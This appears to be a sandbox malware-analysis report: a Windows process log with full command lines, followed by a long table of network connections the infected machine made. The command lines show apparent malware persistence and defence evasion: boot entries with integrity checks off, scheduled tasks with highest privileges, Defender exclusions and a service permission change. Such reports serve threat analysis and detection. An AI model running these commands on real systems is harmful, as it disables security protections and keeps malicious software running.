C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:936 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1396 CREDAT:275457 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\1028.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\1028.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe"
C:\Users\Admin\AppData\Local\Temp\6C6B.exe
C:\Users\Admin\AppData\Local\Temp\6C6B.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\84BD.exe
C:\Users\Admin\AppData\Local\Temp\84BD.exe
C:\Users\Admin\AppData\Local\Temp\A6CE.exe
C:\Users\Admin\AppData\Local\Temp\A6CE.exe
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe"
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 128
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\CF74.exe
C:\Users\Admin\AppData\Local\Temp\CF74.exe
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp
C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\AppData\Local\Temp\EF74.exe
C:\Users\Admin\AppData\Local\Temp\EF74.exe
C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp" /SL5="$303CE,4061719,54272,C:\Users\Admin\AppData\Local\Temp\EF74.exe"
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {8903C1B5-A8FA-445B-8D40-1E14AB9CCD71} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\8.exe
C:\Users\Admin\AppData\Local\Temp\8.exe
C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp" /SL5="$303CA,4314505,54272,C:\Users\Admin\AppData\Local\Temp\8.exe"
C:\Users\Admin\AppData\Local\Temp\305.exe
C:\Users\Admin\AppData\Local\Temp\305.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe Fm /fBsite_idZpU 525403 /S
Network
| Country | Destination | Domain | Proto |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.29.103:80 | def.bestsup.su | tcp |
| US | 172.67.180.151:80 | 294down-river.sbs | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| US | 172.67.180.151:443 | 294down-river.sbs | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.154.10:443 | cleued.com | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 104.21.32.227:443 | pergor.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 172.67.147.32:443 | iplis.ru | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 068aa7a0-365c-4e37-892e-354720613d6a.uuid.theupdatetime.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| RU | 193.233.132.62:50500 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.tris.com | udp |
| US | 104.21.60.34:443 | api.tris.com | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 185.215.113.46:80 | 185.215.113.46 | tcp |
| US | 8.8.8.8:53 | selebration17io.io | udp |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.linkedin.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| NL | 173.194.79.84:443 | accounts.google.com | tcp |
| NL | 173.194.79.84:443 | accounts.google.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| US | 13.107.42.14:443 | www.linkedin.com | tcp |
| US | 13.107.42.14:443 | www.linkedin.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | static.licdn.com | udp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| DE | 178.254.31.125:443 | tcp | |
| US | 8.8.8.8:53 | platform.linkedin.com | udp |
| US | 13.107.246.64:443 | platform.linkedin.com | tcp |
| US | 13.107.246.64:443 | platform.linkedin.com | tcp |
| CA | 198.245.60.91:443 | tcp | |
| LV | 195.123.209.91:5092 | tcp | |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | accounts.youtube.com | udp |
| GB | 172.217.16.238:443 | accounts.youtube.com | tcp |
| GB | 172.217.16.238:443 | accounts.youtube.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| DE | 165.227.174.150:9001 | tcp | |
| US | 128.31.0.39:9101 | tcp | |
| US | 8.8.8.8:53 | m.facebook.com | udp |
| GB | 163.70.147.35:443 | m.facebook.com | tcp |
| GB | 163.70.147.35:443 | m.facebook.com | tcp |
| GB | 163.70.147.35:443 | m.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | facebook.com | udp |
| GB | 163.70.147.35:443 | facebook.com | tcp |
| GB | 163.70.147.35:443 | facebook.com | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.35:443 | facebook.com | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| GB | 163.70.147.35:443 | fbcdn.net | tcp |
| GB | 163.70.147.35:443 | fbcdn.net | tcp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | server7.theupdatetime.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| NL | 192.42.116.17:443 | tcp | |
| US | 8.8.8.8:53 | crls.pki.goog | udp |
| US | 8.8.8.8:53 | crls.pki.goog | udp |
| US | 8.8.8.8:53 | crls.pki.goog | udp |
| BG | 185.82.216.108:443 | server7.theupdatetime.org | tcp |
| US | 8.8.8.8:53 | crls.pki.goog | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| GB | 172.217.16.227:80 | crls.pki.goog | tcp |
| IT | 142.251.27.127:19302 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| GB | 163.70.147.35:443 | fbsbx.com | tcp |
| GB | 163.70.147.35:443 | fbsbx.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| FR | 157.240.195.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 188.114.97.2:443 | walkinglate.com | tcp |
| US | 154.35.175.225:443 | tcp | |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | scontent.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | scontent.xx.fbcdn.net | tcp |
| DE | 212.227.171.107:9001 | tcp | |
| US | 162.237.207.53:80 | tcp | |
| GB | 163.70.147.35:443 | fbsbx.com | tcp |
| DE | 212.227.171.107:9001 | tcp | |
| BG | 185.82.216.108:443 | server7.theupdatetime.org | tcp |
| US | 162.237.207.53:80 | tcp | |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| BG | 185.82.216.108:443 | server7.theupdatetime.org | tcp |
| US | 8.8.8.8:53 | trmpc.com | udp |
| KR | 211.119.84.111:80 | trmpc.com | tcp |
| US | 8.8.8.8:53 | en.bestsup.su | udp |
| US | 104.21.29.103:80 | en.bestsup.su | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 174.128.250.163:80 | tcp | |
| US | 8.8.8.8:53 | pre-usapass.com | udp |
| US | 8.8.8.8:53 | preparedppl.com | udp |
| US | 104.21.57.254:443 | pre-usapass.com | tcp |
| US | 146.190.161.121:443 | preparedppl.com | tcp |
| US | 8.8.8.8:53 | printescort.com | udp |
| US | 8.8.8.8:53 | programas99.com | udp |
| US | 8.8.8.8:53 | pronamelist.com | udp |
| US | 8.8.8.8:53 | psichemlabs.com | udp |
| US | 104.21.87.214:80 | printescort.com | tcp |
| BR | 149.62.37.31:443 | programas99.com | tcp |
| US | 104.21.82.49:443 | pronamelist.com | tcp |
| US | 8.8.8.8:53 | pumaescorts.com | udp |
| US | 8.8.8.8:53 | puretrolley.com | udp |
| US | 8.8.8.8:53 | pursfinance.com | udp |
| AT | 5.42.64.33:80 | 5.42.64.33 | tcp |
| US | 8.8.8.8:53 | www.printescort.com | udp |
| US | 8.8.8.8:53 | pwpconcrete.com | udp |
| US | 188.114.96.2:80 | pumaescorts.com | tcp |
| US | 8.8.8.8:53 | qrlaunchpad.com | udp |
| US | 162.254.39.102:443 | pursfinance.com | tcp |
| US | 172.67.146.210:443 | www.printescort.com | tcp |
| US | 50.87.253.59:80 | pwpconcrete.com | tcp |
| US | 170.39.77.97:443 | qrlaunchpad.com | tcp |
| US | 8.8.8.8:53 | quicklisted.com | udp |
| US | 8.8.8.8:53 | quoteswings.com | udp |
| US | 8.8.8.8:53 | r1-remapecu.com | udp |
| US | 8.8.8.8:53 | www.pronamelist.com | udp |
| IN | 82.180.143.216:443 | quicklisted.com | tcp |
| GB | 45.77.57.25:443 | quoteswings.com | tcp |
| US | 8.8.8.8:53 | www.radi8forged.com | udp |
| US | 172.67.153.107:443 | www.pronamelist.com | tcp |
| US | 8.8.8.8:53 | rajpootentp.com | udp |
| US | 8.8.8.8:53 | ramnaturals.com | udp |
| FR | 92.205.58.241:443 | www.radi8forged.com | tcp |
| US | 8.8.8.8:53 | ramenxsushi.com | udp |
| US | 8.8.8.8:53 | www.pumaescorts.com | udp |
| US | 8.8.8.8:53 | randpdetail.com | udp |
| US | 66.55.68.202:443 | rajpootentp.com | tcp |
| SG | 217.21.74.13:443 | ramnaturals.com | tcp |
| US | 8.8.8.8:53 | www.life1.us | udp |
| SG | 185.229.118.125:443 | r1-remapecu.com | tcp |
| US | 188.114.97.2:443 | www.pumaescorts.com | tcp |
| DE | 159.69.71.60:80 | ramenxsushi.com | tcp |
| US | 68.65.122.52:443 | www.life1.us | tcp |
| US | 208.109.58.44:80 | randpdetail.com | tcp |
| US | 8.8.8.8:53 | rebkerfuels.com | udp |
| US | 8.8.8.8:53 | redesportes.com | udp |
| US | 8.8.8.8:53 | rentinhminh.com | udp |
| US | 8.8.8.8:53 | rejuvemenow.com | udp |
| US | 8.8.8.8:53 | remix593djs.com | udp |
| US | 8.8.8.8:53 | rent-pro-in.com | udp |
| US | 8.8.8.8:53 | riccreative.com | udp |
| US | 8.8.8.8:53 | renaldhicap.com | udp |
| US | 8.8.8.8:53 | resultshala.com | udp |
| US | 8.8.8.8:53 | replayagile.com | udp |
| US | 8.8.8.8:53 | richbinbong.com | udp |
| US | 198.23.59.151:443 | rebkerfuels.com | tcp |
| US | 8.8.8.8:53 | rimvierlink.com | udp |
| FI | 65.109.88.87:443 | remix593djs.com | tcp |
| BR | 89.117.7.145:443 | redesportes.com | tcp |
| US | 103.224.212.215:443 | retrotowear.com | tcp |
| SG | 185.232.14.221:443 | renaldhicap.com | tcp |
| FR | 89.117.169.178:443 | replayagile.com | tcp |
| VN | 103.74.117.27:443 | rentinhminh.com | tcp |
| US | 8.8.8.8:53 | rohitjamwal.com | udp |
| SG | 194.163.42.237:443 | riccreative.com | tcp |
| US | 8.8.8.8:53 | www.rollsfebric.com | udp |
| IN | 82.180.143.184:443 | resultshala.com | tcp |
| US | 192.185.225.202:443 | rejuvemenow.com | tcp |
| US | 172.67.169.155:443 | rent-pro-in.com | tcp |
| US | 8.8.8.8:53 | roka.academy | udp |
| KR | 158.247.215.252:443 | richbinbong.com | tcp |
| US | 66.29.137.48:443 | rohitjamwal.com | tcp |
| GB | 154.49.138.162:443 | rimvierlink.com | tcp |
| US | 8.8.8.8:53 | romanticbom.com | udp |
| US | 8.8.8.8:53 | rightvolume.com | udp |
| US | 8.8.8.8:53 | royalgiftss.com | udp |
| US | 8.8.8.8:53 | ruta-medica.com | udp |
| US | 8.8.8.8:53 | sabdakhabar.com | udp |
| US | 8.8.8.8:53 | sajiasondha.com | udp |
| US | 8.8.8.8:53 | samchil3737.com | udp |
| US | 8.8.8.8:53 | salarygraph.com | udp |
| DE | 139.162.138.101:443 | royalgiftss.com | tcp |
| US | 104.21.18.147:443 | sabdakhabar.com | tcp |
| US | 172.67.215.90:443 | rightvolume.com | tcp |
| US | 192.185.97.168:443 | sajiasondha.com | tcp |
| US | 166.0.238.62:443 | salarygraph.com | tcp |
| SG | 139.59.124.84:443 | romanticbom.com | tcp |
| US | 62.72.50.130:443 | ruta-medica.com | tcp |
| KR | 3.38.89.57:443 | samchil3737.com | tcp |
| US | 8.8.8.8:53 | salonesluaj.com | udp |
| US | 8.8.8.8:53 | sampaisenak.com | udp |
| US | 8.8.8.8:53 | sandwich665.com | udp |
| US | 8.8.8.8:53 | sapimarcell.com | udp |
| US | 8.8.8.8:53 | sjyey.com | udp |
| US | 8.8.8.8:53 | saudeativas.com | udp |
| US | 8.8.8.8:53 | www.samsarasaga.com | udp |
| US | 8.8.8.8:53 | santafechat.com | udp |
| US | 8.8.8.8:53 | sarahnickle.com | udp |
| US | 8.8.8.8:53 | sasadangoch.com | udp |
| US | 8.8.8.8:53 | schulichbla.com | udp |
| US | 8.8.8.8:53 | sconticaldi.com | udp |
